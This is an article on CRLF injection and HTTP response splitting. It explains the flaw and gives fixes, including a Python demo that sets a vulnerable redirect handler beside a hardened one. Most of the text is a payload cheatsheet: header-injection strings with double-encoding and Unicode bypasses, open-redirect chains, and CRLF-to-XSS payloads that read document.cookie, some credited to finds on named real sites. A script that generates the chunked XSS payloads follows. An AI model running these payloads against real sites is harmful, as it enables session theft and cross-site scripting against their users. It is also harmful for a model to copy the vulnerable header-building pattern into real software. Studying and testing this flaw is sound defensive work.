CRLF stands for CR (Carriage Return, \r, 0x0D) followed by LF (Line Feed, \n, 0x0A).
CRLF Injection is one of the classes of web injection attacks: the attacker gets a CRLF sequence into an HTTP response, which terminates the current header line and lets them start new header lines, or even a second response, of their own (HTTP Response Splitting).
The two characters mark the end of a line, but today's popular operating systems treat them differently.
CRLF Injection Example
In Windows both a CR and an LF are required to mark the end of a line, whereas Linux/UNIX requires only an LF. In the HTTP protocol, the CR-LF sequence always terminates a header line, and an empty line (CRLF CRLF) separates the headers from the body.
Attackers can modify application data, compromising integrity and enabling the exploitation of other vulnerabilities such as Cross-Site Scripting (XSS), web page injection, web server cache poisoning, website defacement and more.
A CRLF Injection attack occurs when a user manages to submit a CRLF into an application and the application reflects it into a response header. This is most commonly done by modifying an HTTP parameter or the URL path, typically with the URL-encoded sequence %0d%0a.
How To Fix?
- Never build HTTP headers by concatenating raw user input; set them through the framework's or server library's header API, which in most current implementations rejects a value containing CR or LF.
- If you must handle it yourself, reject (or at least strip) CR and LF characters before a value reaches an HTTP header, and do so after all URL decoding has happened, so that %0d%0a and double-encoded variants such as %250a cannot slip through.
- Encode the data that you pass into HTTP headers; once CR and LF are escaped they can no longer terminate a line if an attacker attempts to inject them.
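The splitting described above and the fixes just listed, as an added example that is not part of the original article: a redirect handler that builds its response by string concatenation (the vulnerable pattern), a hardened version that rejects line-break characters, and a small header parser that shows the injected Set-Cookie a client would see. The function names, the query parameter and the attacker input are assumptions made for this illustration.

```python
"""
Added example (not from the original article): a redirect handler built by
string concatenation, the hardened equivalent, and a parser that shows what a
client would see. Names and the sample attacker input are illustrative.
"""
from urllib.parse import unquote

CRLF = "\r\n"


def build_redirect_vulnerable(target: str) -> str:
    """Deliberately vulnerable: the URL-decoded parameter is placed straight
    into the Location header, so a CRLF inside it starts a new header line."""
    return (
        "HTTP/1.1 302 Found" + CRLF
        + "Location: " + target + CRLF
        + "Content-Length: 0" + CRLF
        + CRLF
    )


def header_value_or_reject(value: str) -> str:
    """Hardened: refuse any value containing CR, LF or NUL instead of trying to
    scrub it. Rejecting is easier to reason about than stripping: a value that
    was stripped after one URL decode can still carry a second-level encoding
    (e.g. %0a) that a later component decodes into a real line break."""
    if any(c in value for c in ("\r", "\n", "\0")):
        raise ValueError("header value contains a line-break character")
    return value


def build_redirect_hardened(target: str) -> str:
    """Same response, but the user-controlled value is checked first."""
    return (
        "HTTP/1.1 302 Found" + CRLF
        + "Location: " + header_value_or_reject(target) + CRLF
        + "Content-Length: 0" + CRLF
        + CRLF
    )


def parse_headers(raw: str) -> dict:
    """Parse the status line and headers the way a tolerant client does.
    Returns lower-cased header names mapped to values; the last value wins."""
    head, _, _body = raw.partition(CRLF + CRLF)
    headers = {}
    for line in head.split(CRLF)[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


# Constructed attacker input: the cheatsheet's Set-Cookie payload as it would
# arrive URL-encoded in a query parameter such as ?next=...
MALICIOUS_PARAM = "/home%0d%0aSet-Cookie:csrf_token=attackerchosen"


def demo():
    """Run the same decoded input through both handlers.

    Returns (set-cookie value the vulnerable response carries,
             whether the hardened handler rejected the input)."""
    decoded = unquote(MALICIOUS_PARAM)
    injected = parse_headers(build_redirect_vulnerable(decoded)).get("set-cookie")
    try:
        build_redirect_hardened(decoded)
        rejected = False
    except ValueError:
        rejected = True
    return injected, rejected


if __name__ == "__main__":
    print(demo())
```

The decode step matters: the check in header_value_or_reject runs on the decoded string, which is the value that actually lands on the wire, not on the raw %0d%0a form the browser sent.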
CRLF Injection Cheatsheet
HTTP Response Splitting
%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
Header-based test, site root
%0d%0aheader:header
%0aheader:header
%0dheader:header
%23%0dheader:header
%3f%0dheader:header
/%250aheader:header
/%25250aheader:header
/%%0a0aheader:header
/%3f%0dheader:header
/%23%0dheader:header
/%25%30aheader:header
/%25%30%61header:header
/%u000aheader:header
%20%0D%0AHeader-Test:CRLF
%23%0D%0AHeader-Test:CRLF
\r\nHeader-Test:CRLF
\r\n Header-Test:CRLF
\r\n Header-Test:CRLF
%5cr%5cnHeader-Test:CRLF
%E5%98%8A%E5%98%8DHeader-Test:CRLF
%E5%98%8A%E5%98%8D%0D%0AHeader-Test:CRLF
The double-encoded (%250a, %25250a), overlong (%25%30%61) and %u000a variants probe a second round of decoding somewhere in the stack. The variants with a leading space after the line break probe obsolete header folding, where a line starting with whitespace is treated as a continuation of the previous header. %E5%98%8A%E5%98%8D is the UTF-8 encoding of U+560A and U+560D, whose low bytes are 0x0A and 0x0D; a stack that narrows Unicode to a single-byte character set can turn them into a real line break.
CRLF chained with Open Redirect server misconfiguration
Note: this sometimes works. (Discovered on some Yandex sites; it was not exploitable from the root.)
//www.google.com/%2f%2e%2e%0d%0aheader:header
/www.google.com/%2e%2e%2f%0d%0aheader:header
/google.com/%2F..%0d%0aheader:header
CRLF to XSS
%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e
Here 35 is the byte length of the injected body <svg onload=alert(document.domain)> and 23 is the same length in hexadecimal, written as a chunk-size line so the body is also well-formed for a chunked response; the final 0 line is the terminating chunk. X-XSS-Protection:0 turns off the legacy reflected-XSS filter in browsers that still have one.
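Generating the payload above for an arbitrary body, as an added example that is not from the original cheatsheet: the decimal Content-Length and the hexadecimal chunk-size line must both match the body's byte length, which is easy to get wrong by hand when the body is changed. The function name and the default path suffix are assumptions; the suffix is simply the /%2e%2e tail the cheatsheet entry ends with.

```python
"""
Added example (not from the original article): build the chunked-style
CRLF-to-XSS payload from a chosen body so that the decimal Content-Length
and the hex chunk-size line stay consistent. Names are illustrative.
"""
from urllib.parse import quote, unquote


def build_chunked_xss_payload(body: str, path_suffix: str = "/%2e%2e") -> str:
    """Return the URL-encoded payload to append to an injectable header value.

    Line 0 is empty so the first %0d%0a closes the header the injection point
    sits in; the second empty line ends the injected header block; the hex
    chunk size, the body and the terminating '0' chunk follow.
    """
    length = len(body.encode("utf-8"))
    lines = [
        "",
        f"Content-Length:{length}",
        "X-XSS-Protection:0",
        "",
        format(length, "x"),
        body,
        "0",
        "",
    ]
    # Keep the characters the cheatsheet leaves bare; space and others are encoded.
    encoded = "%0d%0a".join(quote(line, safe="<>=()./:") for line in lines)
    return encoded + path_suffix


def decoded_wire_form(payload: str) -> str:
    """What the server sees after one round of URL decoding; useful for
    checking the framing (real CRLFs, blank line, chunk lines) by eye."""
    return unquote(payload)


if __name__ == "__main__":
    p = build_chunked_xss_payload("<svg onload=alert(document.domain)>")
    print(p)
    print(repr(decoded_wire_form(p)))
```

Which length field a client honours depends on the original response: when Transfer-Encoding: chunked is present it takes precedence over Content-Length, so the hex chunk line is the one that frames the body in that case.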
Response splitting on 302 Redirect, before Location header (Discovered in DoD)
%0d%0aContent-Type:%20text%2fhtml%0d%0aHTTP%2f1.1%20200%20OK%0d%0aContent-Type:%20text%2fhtml%0d%0a%0d%0a%3Cscript%3Ealert('XSS');%3C%2fscript%3E
Response splitting on 301 code, chained with Open Redirect to corrupt location header and to break 301 by @black2fan (Facebook bug)
Note: xxx:1 was used to break the open redirect destination (Location header). A great example of how to escalate CRLF to XSS on a 301 status code that would seem unexploitable.
%2Fxxx:1%2F%0aX-XSS-Protection:0%0aContent-Type:text/html%0aContent-Length:39%0a%0a%3cscript%3ealert(document.cookie)%3c/
Source: OWASP, GitHub